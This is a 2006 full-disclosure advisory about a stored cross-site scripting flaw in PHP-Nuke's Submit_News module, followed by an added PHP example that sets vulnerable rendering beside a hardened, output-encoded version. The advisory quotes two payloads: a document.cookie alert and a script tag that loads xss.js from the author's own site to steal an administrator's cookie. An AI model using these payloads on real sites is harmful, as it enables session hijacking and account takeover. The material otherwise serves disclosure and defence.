SECURITYVULNS:DOC:11683
Mar 03, 2006 - 12:00 a.m.

[Full-disclosure] PHP-NUKE Submit_News Cross-Site Scripting Vulnerability


###########################################################################

Advisory #9 Title: PHP-NUKE Submit_News Cross-Site Scripting Vulnerability

Author: 0o_zeus_o0

Contact: [email protected]

Website: www.elitemexico.org

Date: 01/03/2006

Risk: High

Vendor Url: http://www.phpnuke-espanol.org/

Affected Software: php-nuke

Non Affected:

We Are: olimpus klan team

#Info:
#================================================================
#This vulnerability affects all PHP-Nuke systems in the Submit_News module. The bug
#consists of inserting XSS code in a news submission sent by a user, so that
#when the administrator receives that news item their cookie is stolen; this
#would lead to identity theft.

#Example XSS:
#================================================================

#<script>alert(document.cookie);</script>

#<SCRIPT SRC=http://elitemexico.org/xss.js ></SCRIPT>
#================================================================

#Solution:
#================================================================

#VULNERABLE VERSIONS
#================================================================
#all versions

#================================================================
#Contact information
#0o_zeus_o0
#zeus@ diosdelared.com
#www.elitemexico.org
#================================================================
#greetz: lady fire,Mi beba, olimpus klan team and elitemexico
##############################################################################
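
An added example, not part of the advisory and not PHP-Nuke code: the rendering pattern the advisory describes (a submitted news item shown to the administrator without output encoding) beside a hardened version. Function names, field names and the sample submission are hypothetical and constructed; the two script strings are the ones quoted in the advisory, and the cookie settings assume PHP 7.3 or later on a site served over HTTPS.

```php
<?php
// Added example, not PHP-Nuke code. All function and field names are hypothetical.

// Constructed sample: one pending submission as it might sit in a review queue,
// carrying the two strings quoted in the advisory plus an attribute-breaking value.
$pending = [
    'subject' => 'Site update <script>alert(document.cookie);</script>',
    'story'   => "First line\n<SCRIPT SRC=http://elitemexico.org/xss.js ></SCRIPT>",
    'author'  => 'visitor"><b>x',
];

// Vulnerable pattern: submitted fields are concatenated into the admin page as-is,
// so any markup in them is interpreted in the administrator's session.
function render_unsafe(array $s): string
{
    return "<h3>{$s['subject']}</h3><p>{$s['story']}</p>"
         . "<input name=\"author\" value=\"{$s['author']}\">";
}

// Hardened pattern: encode every field for the HTML context at output time.
// ENT_QUOTES covers both quote styles, so attribute values cannot be closed early.
function e(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(array $s): string
{
    // Encode first, then convert newlines, so nl2br's <br> is the only markup added.
    return '<h3>' . e($s['subject']) . '</h3>'
         . '<p>' . nl2br(e($s['story'])) . '</p>'
         . '<input name="author" value="' . e($s['author']) . '">';
}

// Defence in depth: call before session_start(). An HttpOnly session cookie is
// not readable through document.cookie. 'secure' assumes the site uses HTTPS.
function harden_session_cookie(): void
{
    session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
}

// Compare the two renderings of the same constructed submission.
foreach (['unsafe' => render_unsafe($pending), 'safe' => render_safe($pending)] as $name => $html) {
    $live = stripos($html, '<script') !== false || strpos($html, '"><b>') !== false;
    echo $name, ': ', $live ? 'submitted markup reaches the page' : 'submitted markup is inert text', "\n";
}
```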